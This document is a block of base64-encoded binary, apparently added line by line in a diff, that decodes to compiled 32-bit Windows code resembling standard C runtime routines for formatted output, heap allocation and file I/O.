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 